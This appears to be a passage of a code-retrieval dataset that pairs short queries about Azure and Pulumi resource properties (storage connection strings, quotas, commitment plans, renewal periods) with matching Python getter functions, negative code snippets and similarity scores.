query
stringlengths
9
9.05k
document
stringlengths
10
222k
metadata
dict
negatives
listlengths
30
30
negative_scores
listlengths
30
30
document_score
stringlengths
4
10
document_rank
stringclasses
2 values
(Personalization Only) The storage account connection string.
def storage_account_connection_string(self) -> Optional[str]: return pulumi.get(self, "storage_account_connection_string")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rdb_storage_connection_string(self) -> str:\n return pulumi.get(self, \"rdb_storage_connection_string\")", "def account_connection_string(self) -> str:\n return pulumi.get(self, \"account_connection_string\")", "def storage_account(self) -> str:\n return pulumi.get(self, \"storage_account\")", "def storage_account_name(self) -> str:\n return pulumi.get(self, \"storage_account_name\")", "def storage_account_id(self) -> str:\n return pulumi.get(self, \"storage_account_id\")", "def get_storage_conn_string(hostname, account_name, account_key):\n\n blob_endpoint = \"%s/%s\" % (hostname, account_name)\n conn_string = \"DefaultEndpointsProtocol=http;BlobEndpoint=%s;AccountName=%s;AccountKey=%s;\" % (blob_endpoint, account_name, account_key)\n return conn_string", "def aof_storage_connection_string1(self) -> Optional[str]:\n return pulumi.get(self, \"aof_storage_connection_string1\")", "def aof_storage_connection_string0(self) -> Optional[str]:\n return pulumi.get(self, \"aof_storage_connection_string0\")", "def show_storage_account_connection_string(\n resource_group_name, account_name, protocol='https', blob_endpoint=None,\n file_endpoint=None, queue_endpoint=None, table_endpoint=None, key_name='primary'):\n from azure.cli.core._profile import CLOUD\n scf = storage_client_factory()\n obj = scf.storage_accounts.list_keys(resource_group_name, account_name) # pylint: disable=no-member\n try:\n keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member\n except AttributeError:\n # Older API versions have a slightly different structure\n keys = [obj.key1, obj.key2] # pylint: disable=no-member\n\n endpoint_suffix = CLOUD.suffixes.storage_endpoint\n connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(\n protocol,\n endpoint_suffix,\n account_name,\n keys[0] if key_name == 'primary' else keys[1]) # pylint: disable=no-member\n connection_string = '{}{}'.format(connection_string,\n ';BlobEndpoint={}'.format(blob_endpoint) if blob_endpoint else '')\n connection_string = '{}{}'.format(connection_string,\n ';FileEndpoint={}'.format(file_endpoint) if file_endpoint else '')\n connection_string = '{}{}'.format(connection_string,\n ';QueueEndpoint={}'.format(queue_endpoint) if queue_endpoint else '')\n connection_string = '{}{}'.format(connection_string,\n ';TableEndpoint={}'.format(table_endpoint) if table_endpoint else '')\n return {'connectionString': connection_string}", "def _get_autostorage_credentials_label():\n return 'autostorage_account'", "def connection_string(self) -> str:\n if self.dialect == \"sqlite\":\n ret_connection_string = f\"{self.dialect}:///{self.database}\"\n else:\n escaped_password: str = urllib.parse.quote_plus(self.password)\n auth_section: str = f\"{self.username}:{escaped_password}\"\n address: str = f\"{self.host}:{self.port}\"\n ret_connection_string = f\"{self.dialect}://{auth_section}@{address}/{self.database}\"\n\n return ret_connection_string", "def storage_account_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"storage_account_id\")", "def connection_string(self):\n return \"postgresql+psycopg2://%s:%s@%s:%s/%s\" % \\\n (os.environ['DB_USER'],\n os.environ['DB_PASSWORD'],\n os.environ['DB_HOST'],\n os.environ['DB_PORT'],\n self.database_name)", "def get_connection_string():\n connection_string = 'postgresql://' + config.GM_DB_USER + \":\" + config.GM_DB_PASSWORD + \"@\" \\\n + config.GM_DB_HOST + \":\" + config.GM_DB_PORT + \"/\" + config.GM_DB_NAME\n return connection_string", "def default_storage_account_id(self) -> str:\n return pulumi.get(self, \"default_storage_account_id\")", "def storage_account(self) -> Optional[pulumi.Input['EventhubSpecPropertiesCaptureDescriptionDestinationStorageAccountArgs']]:\n return pulumi.get(self, \"storage_account\")", "def get_connection_string(self):\n auth = ''\n if self.user:\n auth = self.user\n if self.password:\n auth = auth + ':' + self.password\n if auth:\n auth += '@'\n conn_string = 'postgresql://{auth}{host}/{dbname}'.format(\n auth=auth, host=self.host, dbname=self.dbname)\n\n return conn_string", "def get_connection_string(self):\n auth = ''\n if self._user:\n auth = self._user\n if self._password:\n auth = auth + ':' + self._password\n if auth:\n auth += '@'\n conn_string = 'postgresql://{auth}{host}/{dbname}'.format(\n auth=auth, host=self._hostname, dbname=self._dbname)\n\n return conn_string", "def storage_account_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"storage_account_id\")", "def storage_account_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"storage_account_id\")", "def storage_account_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"storage_account_id\")", "def connection_string(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"connection_string\")", "def connection_string(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"connection_string\")", "def storage_account_tenant_id(self) -> Optional[str]:\n return pulumi.get(self, \"storage_account_tenant_id\")", "def establish_connection() -> storage.client.Client:\n storage_client = storage.Client.from_service_account_json(find('Agriculture.json', '/home'))\n return storage_client", "def get_azure_storage_account_name(self):\n try:\n account = self.instance_metadata.get_tags()['bkp_storage_account']\n logging.debug(\"Using storage account name from instance metadata: %s\", account)\n except Exception:\n cid = self.get_customer_id().lower()\n name = self.get_vm_name()[0:5]\n account = \"sa{}{}backup0001\".format(name, cid)\n logging.debug(\"No storage account in instance metadata, using generated: %s\", account)\n return account", "def connection_string(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"connection_string\")", "def get_db_connect_string(self):\n template_string = \"host={} dbname={} user={} password={}\"\n return template_string.format(self.get(\"DB_HOST\"),\n self.get(\"DB_NAME\"),\n self.get(\"DB_USER\"),\n self.get(\"DB_PASSWORD\"))", "def storage_account_subscription_id(self) -> Optional[str]:\n return pulumi.get(self, \"storage_account_subscription_id\")", "def artifacts_storage_account_id(self) -> str:\n return pulumi.get(self, \"artifacts_storage_account_id\")" ]
[ "0.78525084", "0.77868885", "0.7490864", "0.7084924", "0.68205947", "0.680374", "0.6798149", "0.65964776", "0.6592029", "0.65299773", "0.63563156", "0.6331491", "0.63102967", "0.6303591", "0.62777317", "0.6277717", "0.6274107", "0.6228608", "0.6228479", "0.6141211", "0.6141211", "0.61337936", "0.61337936", "0.6106763", "0.60186505", "0.59950376", "0.59929955", "0.59721255", "0.5929622", "0.5918848" ]
0.8600586
0
(Metrics Advisor Only) The super user of Metrics Advisor.
def super_user(self) -> Optional[str]: return pulumi.get(self, "super_user")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def user(self):\n pass", "def user(self):\n return self.getattr('user')", "def user(self):\n return self._forced_user", "def get_user(self):\n return None", "def user(self):\n return self._user", "def user(self):\n return self._user", "def user(self):\n return self._user", "def user(self):\n return self._user", "def get_current_user(self):\n return None", "def user(self):\n return self.owner.user", "def get_user(self):\n raise NotImplementedError", "def get_user(self):\n return self.get('users/self')", "def get_user(self):\n return self.user", "def get_user(self):\n return self.user", "def user(self) -> str:\n return self._user", "def get_current_user(self):\r\n return self.jira.current_user()", "def get_current_user(self):\n return self.current_user", "def _get_current_user(self):\r\n real_user = self.runtime.get_real_user(self.runtime.anonymous_student_id)\r\n return real_user", "def user(self):\n u = self.user_info\n return self.user_model.get_by_id(u['user_id']) if u else None", "def user(self):\n return self.contact.user", "def me():\n return current_user.get()", "def author(self):\r\n return self.user", "def target_user(self):\n return self.request.user", "def user(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"user\")", "def _current_login_user(self):\n return self.env.uid", "def get_default(cls):\n return cls.USER", "def isSuper(self):\n user = self.getSession()\n return self.pipe.auth.isSuper(user)", "def user(self):", "def nscaweb_user(self):\n return self.__get_option('nscaweb_user')", "def current_user_info():\n\n return current_user" ]
[ "0.6955923", "0.66741955", "0.66067237", "0.6595119", "0.6546568", "0.6546568", "0.6546568", "0.6546568", "0.65376055", "0.64804995", "0.6439071", "0.6429419", "0.63909256", "0.63909256", "0.6382017", "0.6368345", "0.63560563", "0.6195999", "0.6175691", "0.6140341", "0.61271036", "0.61076653", "0.61040825", "0.6099704", "0.60976213", "0.6089839", "0.6072301", "0.60701686", "0.6046301", "0.60394776" ]
0.7323845
0
(Metrics Advisor Only) The website name of Metrics Advisor.
def website_name(self) -> Optional[str]: return pulumi.get(self, "website_name")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getSiteName():\n return os.environ['SITENAME']", "def site_name(self, obj):\n site = obj.site\n return (\"%s\" % (site.name))", "def sitename(self) :\n\t\ttry :\n\t\t\treturn self._sitename\n\t\texcept Exception as e:\n\t\t\traise e", "def bucket_website_domain_name(self) -> str:\n ...", "def Site(self) -> str:", "def get_website(self, name):\n return self.store.website.id", "def bucket_website_domain_name(self) -> str:\n return jsii.get(self, \"bucketWebsiteDomainName\")", "def bucket_website_domain_name(self) -> str:\n return jsii.get(self, \"bucketWebsiteDomainName\")", "def admin_site_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"admin_site_name\")", "def server_site_name(self):\n return dsdb._samdb_server_site_name(self)", "def domain_name(self) -> str:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> str:\n return pulumi.get(self, \"domain_name\")", "def site_name(self):\n # TODO: add a check lookup dictionary for other telescopes\n # to ensure astropy compatibility\n return self.meta[\"header\"][\"TELESCOP\"]", "def website(self):\n return self._website", "def site(obj):\n return \"%s\" % (obj.site.name)", "def get_domain_name(self):\n return self.domain_name.get_text()", "def Hostname(self):\n return self._get_attribute('hostname')", "def domain(cls) -> str:\n return f'{cls.name}.wikimedia.org'", "def get_sitemodulename(self):\n return self.sitemodulename", "def get_id(self):\n return self.get_sitename()", "def metric_name(self) -> str:\n return pulumi.get(self, \"metric_name\")", "def metric_name(self) -> str:\n return pulumi.get(self, \"metric_name\")", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def domain_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"domain_name\")", "def botname(self):\n return settings.AIM_USERNAME", "def website_url(self):\n return self._website_url", "def site_name(request):\n return {'site_name':'CatFood'}", "def marketing_name(self):\n return \"Custom solution - 2\"", "def _get_object_name(self) :\n\t\ttry :\n\t\t\tif self.sitename is not None :\n\t\t\t\treturn str(self.sitename)\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise e" ]
[ "0.69923437", "0.69106567", "0.6616829", "0.6565683", "0.6469414", "0.6435438", "0.6411144", "0.6411144", "0.6380905", "0.6277378", "0.62384963", "0.62384963", "0.617236", "0.61205363", "0.60646456", "0.605211", "0.59489995", "0.5926967", "0.5890607", "0.588797", "0.5839904", "0.5839904", "0.58319676", "0.58319676", "0.58319676", "0.58218443", "0.5807864", "0.58055604", "0.5792449", "0.57910305" ]
0.7566009
0
The renewal period in seconds of Call Rate Limit.
def renewal_period(self) -> Optional[float]: return pulumi.get(self, "renewal_period")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def expirePeriodInSeconds(self)->int:\n return self._lic.params['periodInSeconds'].value", "def refresh_period(self):\n return int(self.__get_option('refresh_period'))", "def update_period(self):\n return 0.1", "def refresh_period_in_seconds(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"refresh_period_in_seconds\")", "def token_expires_in(self):\n return 60 * 60", "def cooldown_grace_period_minutes(self):\n return self._cooldown_grace_period_minutes", "def get_period(self):\n # res\n if self._cacheExpiration <= YAPI.GetTickCount():\n if self.load(YAPI._yapiContext.GetCacheValidity()) != YAPI.SUCCESS:\n return YPwmOutput.PERIOD_INVALID\n res = self._period\n return res", "def get_period_guarantee_advance(self):\n return ceiling(self.scheduled_completion, 3)", "def max_age(self):\n return 120 if self.realtime else 1800", "def update_rate_limit(self, request: Request):\n if request.response is None:\n return\n headers = request.response.headers\n\n self.rate_limit_remaining = int(headers[\"x-ratelimit-remaining\"])\n\n self.rate_limit_sleep = int(headers.get(\"Retry-After\", 0))\n if self.rate_limit_sleep:\n self.rate_limit_sleep += 1 # 1 extra second sleep", "def current_effective_deadline(cls) -> float:", "def duration(self):\n if self.is_valid:\n return relativedelta(self.expiry, datetime.date.today()).years\n else:\n return -1", "def call_rate_limit(self) -> 'outputs.CallRateLimitResponse':\n return pulumi.get(self, \"call_rate_limit\")", "def call_rate_limit(self) -> 'outputs.CallRateLimitResponse':\n return pulumi.get(self, \"call_rate_limit\")", "def call_rate_limit(self) -> 'outputs.CallRateLimitResponse':\n return pulumi.get(self, \"call_rate_limit\")", "def expires_in(self):\n # TODO: Use Arrow?\n expiration = datetime.datetime.fromtimestamp(self.expiration)\n now = datetime.datetime.now()\n\n return expiration - now", "def billing_period_duration(self):\n return self._safe_value(VAR_BILLINGPERIODDURATION, int)", "def refresh_interval(self):\n return self._refresh_interval", "def _get_delay(self):\n delay = int(60 / self.REQUESTS_PER_MINUTE * len(accounts.get_all()))\n return delay", "def _get_delay(self):\n delay = int(60 / self.REQUESTS_PER_MINUTE * len(accounts.get_all()))\n return delay", "def circulation_default_extension_duration(loan):\n return timedelta(days=30)", "def rate_limit_remaining(self):\n if os.path.isfile(self.rate_limit_filename):\n st = os.stat(self.rate_limit_filename)\n if time.time() - st.st_ctime > self.RATE_LIMIT_DURATION:\n return self.RATE_LIMIT_COUNT\n else:\n with open(self.rate_limit_filename, 'r') as f:\n failed_login_attempts = int(f.read())\n return max(0, self.RATE_LIMIT_COUNT - failed_login_attempts)\n else:\n return self.RATE_LIMIT_COUNT", "def reset_rate_limit(self):\n self.rate_limit_remaining += 1\n self.rate_limit_remaining = min(\n self.rate_limit_remaining, self.rate_limit_limit)\n\n # Countdown of retry sleep seconds\n if self.rate_limit_sleep:\n self.rate_limit_sleep -= 1", "def rate_limiter(rl_params):\n # Please respect the parties providing these free api's to us and do not modify this code.\n # If I suspect any abuse I will revoke all api keys and require all users\n # to have a personal api key for all services.\n # Thank you\n if not rl_params:\n return\n monitor = xbmc.Monitor()\n win = xbmcgui.Window(10000)\n rl_name = rl_params[0]\n rl_delay = rl_params[1]\n cur_timestamp = int(time.mktime(datetime.datetime.now().timetuple()))\n prev_timestamp = try_parse_int(win.getProperty(\"ratelimiter.%s\" % rl_name))\n if (prev_timestamp + rl_delay) > cur_timestamp:\n sec_to_wait = (prev_timestamp + rl_delay) - cur_timestamp\n log_msg(\n \"Rate limiter active for %s - delaying request with %s seconds - \"\n \"Configure a personal API key in the settings to get rid of this message and the delay.\" %\n (rl_name, sec_to_wait), xbmc.LOGNOTICE)\n while sec_to_wait and not monitor.abortRequested():\n monitor.waitForAbort(1)\n # keep setting the timestamp to create some sort of queue\n cur_timestamp = int(time.mktime(datetime.datetime.now().timetuple()))\n win.setProperty(\"ratelimiter.%s\" % rl_name, \"%s\" % cur_timestamp)\n sec_to_wait -= 1\n # always set the timestamp\n cur_timestamp = int(time.mktime(datetime.datetime.now().timetuple()))\n win.setProperty(\"ratelimiter.%s\" % rl_name, \"%s\" % cur_timestamp)\n del monitor\n del win", "def get_retention_time(self):\n return self.now - datetime.timedelta(days=int(RETENTION_DAYS)) + datetime.timedelta(seconds=int(10))", "def LSPRefreshRate(self):\r\n\t\treturn self._get_attribute('lSPRefreshRate')", "def time_remaining(self):\n with self._lock:\n deadline = self._expiration_manager.deadline()\n return max(0.0, deadline - time.time())", "def retry_interval_in_minutes(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"retry_interval_in_minutes\")", "def retry_interval_in_minutes(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"retry_interval_in_minutes\")", "def get_limit_per_second(self):\n pass" ]
[ "0.7220695", "0.68607104", "0.66482574", "0.6505736", "0.64645785", "0.6337664", "0.62624717", "0.62323433", "0.6031927", "0.6022835", "0.6014422", "0.60099036", "0.60031545", "0.60031545", "0.60031545", "0.5978044", "0.59692264", "0.59621155", "0.5960568", "0.5960568", "0.593474", "0.5931", "0.5921017", "0.59167606", "0.5915931", "0.58997244", "0.58832794", "0.58714163", "0.58714163", "0.5861979" ]
0.73784405
0
Cognitive Services account commitment quota.
def quota(self) -> 'outputs.CommitmentQuotaResponse': return pulumi.get(self, "quota")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def online_quota(self):\r\n return self.max_contributions - self.num_tickets_total", "def account_space(access_token):\n client = dropbox.client.DropboxClient(access_token)\n account_info = client.account_info()\n quota_info = account_info['quota_info']\n total = quota_info['quota']\n used = quota_info['normal'] + quota_info['shared']\n return total - used", "def quota(self) -> int:\n return pulumi.get(self, \"quota\")", "def get_quota(self):\n raise NotImplementedError", "def quota():\n try:\n fname = os.path.join(os.path.expanduser(\"~\"), \".planet.json\")\n contents = {}\n if os.path.exists(fname):\n with open(fname, \"r\") as fp:\n contents = json.loads(fp.read())\n else:\n raise IOError(\"Escape to End and Initialize\")\n if not len(contents) != 0:\n raise IOError(\"Escape to End and Initialize\")\n else:\n k = contents[\"key\"]\n main = requests.get(\n \"https://api.planet.com/auth/v1/\" + \"experimental/public/my/subscriptions\",\n auth=HTTPBasicAuth(k, \"\"),\n )\n if main.status_code == 200:\n content = main.json()\n for item_id in content:\n print(\" \")\n print(\"Allocation Name: %s\" % item_id[\"organization\"][\"name\"])\n print(\n \"Allocation active from: %s\" % item_id[\"active_from\"].split(\"T\")[0]\n )\n print(\"Quota Enabled: %s\" % item_id[\"quota_enabled\"])\n print(\"Total Quota in SqKm: %s\" % item_id[\"quota_sqkm\"])\n print(\"Total Quota used: %s\" % item_id[\"quota_used\"])\n if (item_id[\"quota_sqkm\"]) is not None:\n leftquota = float(\n item_id[\"quota_sqkm\"] - float(item_id[\"quota_used\"])\n )\n print(\"Remaining Quota in SqKm: %s\" % leftquota)\n else:\n print(\"No Quota Allocated\")\n print(\"\")\n else:\n print(\"Failed with exception code: \" + str(main.status_code))\n\n except IOError:\n print(\"Initialize client or provide API Key\")", "def AllocateQuota(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _get_next_limit(self):\n return self.__quota", "def getAccountSize(self, authenticationToken):\r\n pass", "def current_capacity_range(self):\n done, data = self._request('GC')\n if done:\n return int(data[0]), int(data[1])\n\n raise EvseError", "def get_additional_ball_capacity(self):\n return 999", "def get_additional_ball_capacity(cls):\n return 999", "def test_list_cluster_resource_quota(self):\n pass", "def get_send_quota(self):\r\n return self._make_request('GetSendQuota')", "def test_create_cluster_resource_quota(self):\n pass", "def charge_limit(self, limit=None):\n if limit is None:\n done, data = self._request('GH')\n if done:\n return int(data[0])\n else:\n if self._request('SH', str(int(limit)))[0]:\n return limit\n\n raise EvseError", "def set_bucket_quota(self, uid, max_objects, cluster_name=\"ceph\"):\n cmd = (\n \"radosgw-admin quota set --uid=%s --quota-scope=bucket --max-objects=%s --cluster %s\"\n % (uid, max_objects, cluster_name)\n )\n status = utils.exec_shell_cmd(cmd)\n if not status[0]:\n raise AssertionError(status[1])\n log.info(\"quota set complete\")", "def api_quota():\n # Create the required data dictionary for Quota/Status\n api_data = {} # type: Dict[str, str]\n response = http_request(endpoint=API_QUOTA, data=api_data)\n\n if response.get('errorNo') != 0:\n return_error('API Returned, {}:{}'.format(response.get('errorNo'), response.get('errorMsg')))\n\n return response", "def usage_quota(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"usage_quota\")", "def _calculate_simple_quota(context, resource, requested):\n quota = get_project_quotas(context, context.project_id)\n allowed = _get_request_allotment(requested, 0, quota[resource])\n return min(requested, allowed)", "def capacity_gb(self) -> str:\n return pulumi.get(self, \"capacity_gb\")", "def get_request_limit(self, access_token):\n url = \"{0}/rate_limit?access_token={1}\"\n response = requests.get(url.format(self.ROOT_API_URL, access_token))\n data = response.json()\n return data['resources']['core'].get(\"remaining\")", "def create_capacity_limiter(total_tokens: float) -> abc.CapacityLimiter:\n return get_asynclib().CapacityLimiter(total_tokens)", "def budget_used(self):\n return int(self.total_spent() / self.budget() * 100.0)", "def get_quota(self):\n path = 'urlCategories/urlQuota'\n return self._session.get(path)", "def test_replace_cluster_resource_quota(self):\n pass", "def available_capacity(self):\r\n return self.capacity - len(self.passengers)", "def update(self, accountId, name, maxMemoryCapacity, maxVDiskCapacity, maxCPUCapacity, maxNetworkPeerTransfer, maxNumPublicIP, sendAccessEmails=True, **kwargs):\n #put your code here to implement this method\n raise NotImplementedError (\"not implemented method update\")", "def api_quota_command():\n # 1. There is no parameter input required from Demisto\n # 2. Get the quota status info from SlashNext API\n response = api_quota()\n if response.get('errorNo') != 0:\n return\n # 3. Parse and format the response\n quota_data = response.get('quotaDetails')\n\n title = 'SlashNext Phishing Incident Response - API Quota\\n'\\\n '##### Note: {}'.format(quota_data.get('note'))\n\n snx_ioc_cont = {\n 'LicensedQuota': quota_data.get('licensedQuota'),\n 'RemainingQuota': quota_data.get('remainingQuota'),\n 'ExpirationDate': quota_data.get('expiryDate'),\n 'IsExpired': quota_data.get('isExpired')\n }\n\n ec = {\n 'SlashNext.Quota(val.Value === obj.Value)': snx_ioc_cont\n }\n\n md = tableToMarkdown(\n title,\n snx_ioc_cont,\n ['LicensedQuota',\n 'RemainingQuota',\n 'ExpirationDate']\n )\n\n return_outputs(md, ec, snx_ioc_cont)", "def deposits_limit(self):\n limits = self.user.limits\n value = 0\n if limits.exists():\n value = self.user.limits.get(type=Limit.DEPOSIT).value\n return value", "def Capacity(self) -> int:" ]
[ "0.6712958", "0.65523666", "0.6515917", "0.631611", "0.60914433", "0.6000025", "0.57346606", "0.5602452", "0.5518095", "0.551689", "0.54627246", "0.545674", "0.5402079", "0.53996605", "0.53487813", "0.5334519", "0.53081733", "0.5271333", "0.5261874", "0.519679", "0.5194432", "0.5173346", "0.5169073", "0.5160202", "0.51546013", "0.51447475", "0.51438284", "0.5143025", "0.51425904", "0.5134722" ]
0.76280224
0
The Azure resource id of the commitment plan.
def commitment_plan_id(self) -> Optional[str]: return pulumi.get(self, "commitment_plan_id")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def plan_id(self) -> str:\n return self._plan_id", "def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_id\")", "def resource_pool_id(self) -> str:\n return pulumi.get(self, \"resource_pool_id\")", "def resourceid(self):", "def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")", "def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")", "def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")", "def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")", "def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")" ]
[ "0.7716365", "0.6851893", "0.6851893", "0.6851893", "0.6644602", "0.6575877", "0.6432363", "0.643091", "0.643091", "0.6401933", "0.6401933", "0.6401933", "0.6401933", "0.6401933", "0.6317398", "0.6317398", "0.6317398", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6297618", "0.6249792", "0.6249792", "0.6249792", "0.6249792" ]
0.7871174
0
The location of of the commitment plan.
def commitment_plan_location(self) -> Optional[str]: return pulumi.get(self, "commitment_plan_location")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def commitment_plan_id(self) -> Optional[str]:\n return pulumi.get(self, \"commitment_plan_id\")", "def plan(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"plan\")", "def _course_location(self):\r\n return \"location:{org}+{number}+{run}+course+{run}\".format(**self._course_dict)", "def plan(self):\n return read_small_file(self.homeDirectory + \"/.plan\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return self.__location", "def location(self) -> str:\n return self.__location", "def location(self) -> str:\n return self.__location", "def cal_location(self):\n return self.setup_location.name", "def get_absolute_url(self):\n return reverse('plan_proposal',\n kwargs = {'project_name': self.project.slug,\n 'proposal_name': self.slug})", "def location(self) -> str:\n return self._location", "def __init__(__self__, *,\n commitment_plan_id: Optional[str] = None,\n commitment_plan_location: Optional[str] = None):\n if commitment_plan_id is not None:\n pulumi.set(__self__, \"commitment_plan_id\", commitment_plan_id)\n if commitment_plan_location is not None:\n pulumi.set(__self__, \"commitment_plan_location\", commitment_plan_location)", "def get_plan(self):\n sub = self.get_subscription()\n return sub.plan", "def location(self) -> str:\n return self.metadata.location", "def location(self):\n location = self.args.get('location')\n if not location:\n raise JalBotError('Missing required argument -l|-location')\n return location", "def cal_location(self):\n return self.location.name", "def plan(self):\n\n plan = f\"\"\"\n Input parameters: {self.params}\n Product: {self.product}\n\n Source code:\n {self.source_code}\n \"\"\"\n\n print(plan)", "def plan_id(self) -> str:\n return self._plan_id" ]
[ "0.6826332", "0.6241266", "0.61446285", "0.60929376", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60002583", "0.60002583", "0.60002583", "0.5996172", "0.5973236", "0.5964412", "0.5941589", "0.5926451", "0.5905032", "0.5895706", "0.5864075", "0.5858786", "0.5854414" ]
0.8788695
0
Cognitive Services account commitment period.
def last(self) -> 'outputs.CommitmentPeriodResponse': return pulumi.get(self, "last")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def current(self) -> Optional['outputs.CommitmentPeriodResponse']:\n return pulumi.get(self, \"current\")", "def get_period_guarantee_advance(self):\n return ceiling(self.scheduled_completion, 3)", "def current_effective_deadline(cls) -> float:", "def next(self) -> Optional['outputs.CommitmentPeriodResponse']:\n return pulumi.get(self, \"next\")", "def checkpoint_period_get(self):\n raise Exception(\"TODO\")", "def update_period(self):\n return 0.1", "async def payday(self, ctx: commands.Context):\r\n author = ctx.author\r\n guild = ctx.guild\r\n\r\n cur_time = calendar.timegm(ctx.message.created_at.utctimetuple())\r\n credits_name = await bank.get_currency_name(ctx.guild)\r\n if await bank.is_global(): # Role payouts will not be used\r\n\r\n # Gets the latest time the user used the command successfully and adds the global payday time\r\n next_payday = (\r\n await self.config.user(author).next_payday() + await self.config.PAYDAY_TIME()\r\n )\r\n if cur_time >= next_payday:\r\n try:\r\n await bank.deposit_credits(author, await self.config.PAYDAY_CREDITS())\r\n except errors.BalanceTooHigh as exc:\r\n await bank.set_balance(author, exc.max_balance)\r\n await ctx.send(\r\n _(\r\n \"You've reached the maximum amount of {currency}!\"\r\n \"Please spend some more \\N{GRIMACING FACE}\\n\\n\"\r\n \"You currently have {new_balance} {currency}.\"\r\n ).format(\r\n currency=credits_name, new_balance=humanize_number(exc.max_balance)\r\n )\r\n )\r\n return\r\n # Sets the current time as the latest payday\r\n await self.config.user(author).next_payday.set(cur_time)\r\n\r\n pos = await bank.get_leaderboard_position(author)\r\n embed = Embed.create(\r\n self, ctx, title=\"<:dollarbag:778687019944771616> Payday!\",\r\n description=(\r\n \"Here you go, {author.name}. \"\r\n \"Don't spend it too quickly!\\n\\n\"\r\n \"<:plus:777167188816560168> 